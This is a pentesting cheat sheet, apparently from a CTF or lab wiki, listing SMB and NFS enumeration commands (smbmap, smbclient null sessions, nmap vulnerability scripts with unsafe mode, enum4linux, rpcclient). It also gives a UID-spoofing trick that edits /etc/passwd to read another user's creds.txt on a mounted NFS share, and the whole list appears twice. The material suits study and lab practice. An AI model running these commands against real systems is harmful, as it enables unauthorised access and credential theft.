SMB - 139, 445

Server Connection

$ smbmap -H $ip

$ smbmap -u <user> -H $ip

$ smbclient -L $ip

$ smbclient -N -L //10.10.10.4

$ ls -l /usr/share/nmap/scripts/smb*

$ nmap -p 139,445 --script smb-vul* $ip

$ nmap -A 10.10.10.4

$ nmap -p 139,445 $ip --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery

$ mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs

$ mount -o nolock $ip:/home ~/home/

-rwx------ 1 1014  1014   48 Jun 10 09:16 creds.txt

$ sudo adduser pwn
$ sudo sed -i -e 's/1001/1014/g' /etc/passwd
$ su pwn
$ cat creds.txt

$ smbclient //ip/tmp

$ smbclient \\\\ip\\ipc$ -U john 

$ smbclient //ip/ipc$ -U john

$ nbtscan -r $ip

$ enum4linux -a $ip

$ rpcclient -U "" $ip

$ srvinfo
$ enumdomusers
$ getdompwinfo
$ querydominfo
$ netshareenum
$ netshareenumall

Last updated 4 years ago

Was this helpful?

$ smbmap -H $ip

$ smbmap -u <user> -H $ip

$ smbclient -L $ip

$ smbclient -N -L //10.10.10.4

$ ls -l /usr/share/nmap/scripts/smb*

$ nmap -p 139,445 --script smb-vul* $ip

$ nmap -A 10.10.10.4

$ nmap -p 139,445 $ip --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery

$ mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs

$ mount -o nolock $ip:/home ~/home/

-rwx------ 1 1014  1014   48 Jun 10 09:16 creds.txt

$ sudo adduser pwn
$ sudo sed -i -e 's/1001/1014/g' /etc/passwd
$ su pwn
$ cat creds.txt

$ smbclient //ip/tmp

$ smbclient \\\\ip\\ipc$ -U john 

$ smbclient //ip/ipc$ -U john

$ nbtscan -r $ip

$ enum4linux -a $ip

$ rpcclient -U "" $ip

$ srvinfo
$ enumdomusers
$ getdompwinfo
$ querydominfo
$ netshareenum
$ netshareenumall

Last updated 4 years ago

Was this helpful?